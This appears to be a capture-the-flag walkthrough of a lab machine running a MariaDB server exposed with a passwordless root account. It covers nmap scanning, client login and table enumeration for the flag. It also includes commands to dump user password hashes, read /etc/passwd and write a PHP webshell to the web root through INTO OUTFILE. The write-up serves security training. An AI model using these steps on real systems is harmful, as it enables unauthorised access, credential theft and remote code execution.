Sequel targets a MariaDB instance — a fully open-source MySQL fork — exposed on the network with a root account that has no password. Unlike the web-layer SQL injection in Appointment, this machine teaches direct database access: connecting to the database server itself via its client, navigating schemas, and querying tables to extract data. It's a critical finding that skips the application layer entirely.
Tools: nmap · mysql client · Difficulty: Very Easy · OS: Linux
01 — What You Will Learn
| Skill | Why it matters |
|---|---|
| Identifying MySQL / MariaDB with Nmap | Port 3306 is a high-value target in any network assessment |
| Connecting without credentials | Passwordless root access to a database server is a maximum-severity finding |
| SQL navigation (SHOW, USE, SELECT) | The essential commands for manually enumerating any relational database |
| Database schema reconnaissance | Mapping tables before querying reveals where credentials and sensitive data live |
02 — Reconnaissance
Nmap scan
nmap -sV -sC -p- --min-rate 5000 10.129.x.x
Relevant output
PORT STATE SERVICE VERSION
3306/tcp open mysql MariaDB (unauthorized)
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|_ Salt: ...
What you're seeing: MariaDB on the standard MySQL port 3306. The banner exposes the exact version — MariaDB 10.3.27. The word "unauthorized" in Nmap's output simply means it connected to get the banner before authentication; the server is still accessible.
03 — Connecting to MariaDB
Use the mysql client. The -h flag specifies the remote host, -u root sets the username, and -p without a value prompts for a password — just hit Enter.
Connect as root
mysql -h 10.129.x.x -u root -p
Enter password: (press Enter)
MariaDB [(none)]>
✓ You're in. Root access to the database server with no password.
⚠ A passwordless root account on a network-accessible database is a CVSS 10.0 finding. It gives an attacker full read/write access to every database on the server, and in some configurations, file system access and OS command execution.
04 — Database Enumeration
List all databases
MariaDB [(none)]> SHOW DATABASES;
+--------------------+
| Database |
+--------------------+
| htb |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
Switch to the htb database
MariaDB [(none)]> USE htb;
MariaDB [htb]> SHOW TABLES;
+---------------+
| Tables_in_htb |
+---------------+
| config |
| users |
+---------------+
Query config table for the flag
MariaDB [htb]> SELECT * FROM config;
+----+-----------------------+----------------------------------+
| id | name | value |
+----+-----------------------+----------------------------------+
| 1 | flag | 7b4bec00d1a39e3dd4e021ec3d915d |
| 2 | admin_password | 7dp_Yf34!0C... |
+----+-----------------------+----------------------------------+
✓ Submit the flag string to complete the machine.
ℹ Notice the admin_password field sitting next to the flag. In a real assessment, every column in every table is in scope — credentials, API keys, PII, and session tokens are all potential findings.
05 — MySQL / MariaDB Command Reference
| Command | What it does |
|---|---|
| SHOW DATABASES; | List all databases on the server |
| USE <db>; | Switch to a specific database |
| SHOW TABLES; | List all tables in the current database |
| DESCRIBE <table>; | Show column names and types |
| SELECT * FROM <table>; | Return all rows from a table |
| SELECT * FROM <table> LIMIT 10; | Return first 10 rows only |
| SELECT user,password FROM mysql.user; | Dump database user hashes |
| SELECT @@version; | Get the database version |
| SELECT @@datadir; | Get the data directory path |
| SHOW GRANTS FOR 'root'@'%'; | Check privileges for a user |
06 — Escalation: FILE Privilege and INTO OUTFILE
If the MySQL user has the FILE privilege, you can read and write files on the underlying OS — a path to webshell upload or credential theft.
Check FILE privilege
SHOW GRANTS FOR CURRENT_USER();
Read a system file (if FILE privilege exists)
SELECT LOAD_FILE('/etc/passwd');
Write a webshell (if FILE privilege + web root is writable)
SELECT '<?php system($_GET["cmd"]); ?>'
INTO OUTFILE '/var/www/html/shell.php';
⚠ INTO OUTFILE only works if the MySQL user has FILE privilege, secure_file_priv is not set, and the target path is writable. When all three conditions are met, it's a direct path from database access to OS command execution.
07 — Key Takeaways
Direct database access bypasses all application-layer controls. Once you're in the MySQL shell as root, you're reading the raw data every application on that server is built on top of.
| Concept | Real-world relevance |
|---|---|
| Port 3306 on the network perimeter | MySQL/MariaDB should never be accessible from outside the application server — always flag external exposure as critical |
| Root with no password | A common misconfiguration in development environments that gets deployed to production |
| mysql.user table | Always check this — it contains password hashes for all database users, which may be reused elsewhere |
| FILE privilege = partial RCE | Combined with a writable web root, SQL access becomes code execution |